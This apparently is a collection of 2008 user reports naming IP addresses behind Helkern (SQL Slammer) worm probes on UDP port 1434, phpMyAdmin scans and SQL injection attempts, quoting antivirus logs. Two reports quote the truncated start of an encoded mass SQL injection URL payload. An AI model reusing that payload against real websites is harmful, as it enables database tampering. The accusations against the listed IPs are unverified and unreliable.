Kaspersky Internet Security found on 11/19/2008 6:07:30 PM, UDP from 202.99.11.99 to local port 1434 Absent Detected: Intrusion.Win.MSSQL.worm.Helkern...

Kaspersky is blockig multiple UDP's from 222.82.249.235 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern. Other IP's: 220.250.21.226 61.177.196.226 218.22.244.45 58.20.154.23 ...

My firewall repeatedly detects intrusions coming from and the warning is: detected intrusion win mssql worm helkern coming from ip: 218.75.84.150 and port 1434...

this user is using a script to check if you are running any versions of phpMyAdmin, upon checking my error log there are 100's of entries in the last hour...

11/06/2008 21:53:11 PM Detected: SQL worm from 59.63.157.142 to local port 1434...

intrusion.Win.MSSQL.worm.Helkern! Attacker IP address: 218.23.142.157. Protocol/service: UDP on local port 1394...

Host has been trying to feed malicious url variables, for example: [url removed]=2;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283...

Host has been tryinmg to feed malicious url variables, for example: [url removed]=4\';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172...

This ip is showen in my mysql databse and has banned all the people who are in my community. and also has hacked in to my system. and has said many bad words. also this ip is keep doing that to me and...

This IP is trying to hack our site with sql injection attacks, setting URL querystring vars to sql scripting. For details: http://www.developersdex.com/sql/message.asp?p=580&r=6338912...

5/23/2008 5:01:39 PM Intrusion.Win.MSSQL.worm.Helkern! Attacker\'s IP address: 221.6.90.130. Protocol/service: UDP on local port 1434. Time: 5/23/2008 5:01:39 PM ...

5/23/2008 1:07:52 AM Intrusion.Win.MSSQL.worm.Helkern! Attacker\'s IP address: 61.132.223.14. Protocol/service: UDP on local port 1434. Time: 5/23/2008 1:07:52 AM ...

5/23/2008 11:50:23 AM Intrusion.Win.MSSQL.worm.Helkern! Attacker\'s IP address: 218.22.5.108. Protocol/service: UDP on local port 1434. Time: 5/23/2008 11:50:23 AM ...

5/23/2008 11:50:47 AM Intrusion.Win.MSSQL.worm.Helkern! Attacker\'s IP address: 218.7.160.84. Protocol/service: UDP on local port 1434. Time: 5/23/2008 11:50:47 AM ...

Network attacks detected: 3 Last attack: 5/24/2008 5:32:05 PM Start time: 5/24/2008 1:21:03 PM Duration: 04:18:05 Network attacks --------------- Time Attack description Source Protocol Local port ...

My website, hosting in Brasil it was attacked by this IP 221.206.20.143 and change the content of the MS-SQL database containing a EXPLOIT script....

Hello I want to report abuser with IP adress 208.70.24.232 on our joomla site www.oathrecords.com. Our JGuard report 15 The attacks of type Mysql Injection in 1hour....

This guy from shangai is trying to attack through a worm named helkern. The above posted details are from my antivirus reports....